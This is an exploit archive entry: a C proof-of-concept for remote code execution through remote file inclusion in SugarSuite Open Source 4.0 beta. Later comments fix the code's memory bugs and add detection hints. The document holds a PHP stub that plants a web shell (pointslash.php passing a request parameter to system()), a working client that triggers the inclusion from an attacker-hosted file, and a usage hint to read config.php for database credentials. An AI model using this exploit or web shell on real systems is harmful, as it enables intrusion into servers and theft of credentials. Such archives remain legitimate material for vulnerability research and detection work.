SugarSuite Open Source 4.0beta - Remote Code Execution (2)

EDB-ID:

1364




Platform:

PHP

Date:

2005-12-08


/*

gcc -o sugar sugar.c

Usage ./sugar [host] [/path/] [site] [cmd]

Sugar Suite Open Source <= 4.0 beta: remote code execution through remote file inclusion in acceptDecline.php (beanFiles parameter); proof of concept in C
coded by: pointslash v.
credits: rgod, unitedasia

host - hostname (ex: www.sitename.com)
path - path (ex: /sugar/ or just / )
site - remote location ( ex: http://www.somesite.com/file.txt)
cmd  - specify a command ("cat config.php" to see database username & password)

example ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a;

Put this in your file.txt

<?php
$fp=fopen("pointslash.php","w");
fputs($fp,"<? error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>

./sugar  www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html

Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown


*/

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

/* TCP port used for every connection; the tool speaks plain HTTP only. */
#define HTTP_PORT 80


/*
 * Usage epilogue printed when too few arguments are given. "%%" is a printf
 * escape, so this text is written to be used as a format string. It is well
 * over 190 bytes long. It embeds the PHP stub the remote file is expected to
 * contain: the stub writes pointslash.php, a script that passes the "cmd"
 * request parameter to system(). The presence of a file with that name and
 * content in a web root is an indicator of compromise.
 */
#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n<?php\n$fp=fopen(\"pointslash.php\",\"w\");\nfputs($fp,\"<? error_reporting(0);ini_set('max_execution_time',0); system(\\$HTTP_GET_VARS[cmd]);?>\");\nfclose($fp);\n?>\n\n"


/****************** MAIN *********************/

/*
 * Forward declaration; the definition follows main(). The array sizes in the
 * parameter list are documentation only: both parameters are adjusted to
 * plain pointers, so sizeof(buffer) inside the function is the size of a
 * pointer, not 8192.
 */
void sendpacket(char buffer[8192], int p, char host[100]);


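/*
 * Entry point. Expects four arguments (host, path, site, cmd) and issues two
 * plain-HTTP GET requests through sendpacket():
 *
 *   1. <path>acceptDecline.php?beanFiles[1]=<site>&beanList[1]=1&module=1
 *      with User-Agent "MantraAgent"; the reply is not read.
 *   2. <path>pointslash.php?cmd=<cmd> with User-Agent "Vagabondo/2.0 MT";
 *      the reply is copied to stdout.
 *
 * For log review and detection: both requests are HTTP/1.0, end their lines
 * with a bare "\n" instead of CRLF, and carry the fixed User-Agent strings
 * above. A beanFiles[...] parameter holding a URL, or any request for
 * pointslash.php, presumably never occurs in legitimate traffic.
 * NOTE(review): the inclusion appears to depend on the target's PHP
 * configuration (URL includes allowed, request variables overriding
 * globals) - confirm against the vendor advisory; moving off the affected
 * release (<= 4.0 beta per the header comment) is the remedy.
 *
 * Returns 0 after both requests were sent; exits with status 1 on a usage
 * error or when a request does not fit into the request buffer.
 */
int main( int argc, char **argv)
{
    char buffer[8192];
    int len;

    if (argc < 5)
    {
         printf("Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source <= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n",argv[0]);
         printf("host - hostname (ex:www.sitename.com)\n");
         printf("path - path (ex: /sugar/ or just / )\n");
         printf("site - remote location ( ex: http://www.somesite.com/file.txt)\n");
         printf("cmd  - specify a command (\"cat config.php\" to see database username & password)\n");
         /*
          * DATA is a string literal written as a format ("%%" escapes), so
          * it is printed directly. The previous code first expanded it with
          * sprintf() into a 190-byte array that is too small for it (stack
          * overflow, CWE-121) and then passed the expanded text, which
          * contains a bare '%', to printf() as the format (CWE-134).
          */
         printf(DATA);
         exit(1);
    }

    /*
     * The arguments come straight from the command line and have no length
     * limit, so every request is built with snprintf() and rejected when it
     * would not fit; an unbounded sprintf() here overflows the stack buffer.
     * The arguments are inserted verbatim, exactly as before.
     */
    len = snprintf( buffer, sizeof buffer, "GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n", argv[2], argv[3], argv[1]);
    if (len < 0 || (size_t)len >= sizeof buffer) {
        fprintf( stderr, "request does not fit into %lu bytes\n", (unsigned long)sizeof buffer);
        exit(1);
    }

    sendpacket(buffer,0,argv[1]);

    len = snprintf( buffer, sizeof buffer, "GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n", argv[2], argv[4], argv[1]);
    if (len < 0 || (size_t)len >= sizeof buffer) {
        fprintf( stderr, "request does not fit into %lu bytes\n", (unsigned long)sizeof buffer);
        exit(1);
    }

    sendpacket(buffer,1,argv[1]);

    /* The original returned an uninitialized local as the exit status. */
    return 0;
}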

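/*
 * Sends one prepared HTTP request to `host` on HTTP_PORT and, if asked,
 * copies the reply to standard output.
 *
 * buffer - NUL-terminated request text; sent unchanged and not modified.
 * p      - 1: read the reply until the peer closes the connection and write
 *          it to file descriptor 1; any other value: close right after
 *          sending without reading.
 * host   - server name, resolved with gethostbyname() (IPv4 only).
 *
 * Exits the process with status 1 when the socket cannot be created, the
 * name does not resolve to a usable IPv4 address, the connection fails or
 * the request cannot be sent.
 */
void sendpacket(char buffer[8192], int p, char host[100])
{
    struct sockaddr_in server;
    struct hostent *host_info;
    char reply[8192];
    ssize_t count;
    int sock;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror( "failed to create socket");
        exit(1);
    }

    /* the server address is made of family, IP address and port number */
    memset( &server, 0, sizeof server);

    /* convert the server name to an IP address */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, "unknown server: %s\n", host);
        exit(1);
    }

    /*
     * The resolver decides h_length, so it is checked before the copy into
     * the fixed-size sin_addr field; a negative value becomes huge after the
     * cast and is rejected as well.
     */
    if (host_info->h_addrtype != AF_INET
        || host_info->h_addr_list[0] == NULL
        || (size_t)host_info->h_length > sizeof server.sin_addr) {
        fprintf( stderr, "no usable IPv4 address for server: %s\n", host);
        exit(1);
    }
    memcpy( &server.sin_addr, host_info->h_addr_list[0], (size_t)host_info->h_length);

    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);

    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
        perror( "can't connect to server");
        close( sock);
        exit(1);
    }

    if ( send( sock, buffer, strlen( buffer), 0) < 0) {
        perror( "failed to send request");
        close( sock);
        exit(1);
    }

    /*
     * Copy the reply to stdout. `buffer` is a pointer here, so the old
     * sizeof(buffer) limited every recv() to the size of a pointer; a local
     * array gives the intended 8192-byte reads and leaves the caller's
     * request untouched. write() is only called with a positive count: the
     * old do/while also called it with 0 and with -1 after a failed recv().
     */
    if (p == 1) {
        while ((count = recv( sock, reply, sizeof reply, 0)) > 0) {
            if (write( 1, reply, (size_t)count) < 0) {
                perror( "failed to write response");
                break;
            }
        }
    }

    /* close the connection to the server */
    close( sock);
}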

// milw0rm.com [2005-12-08]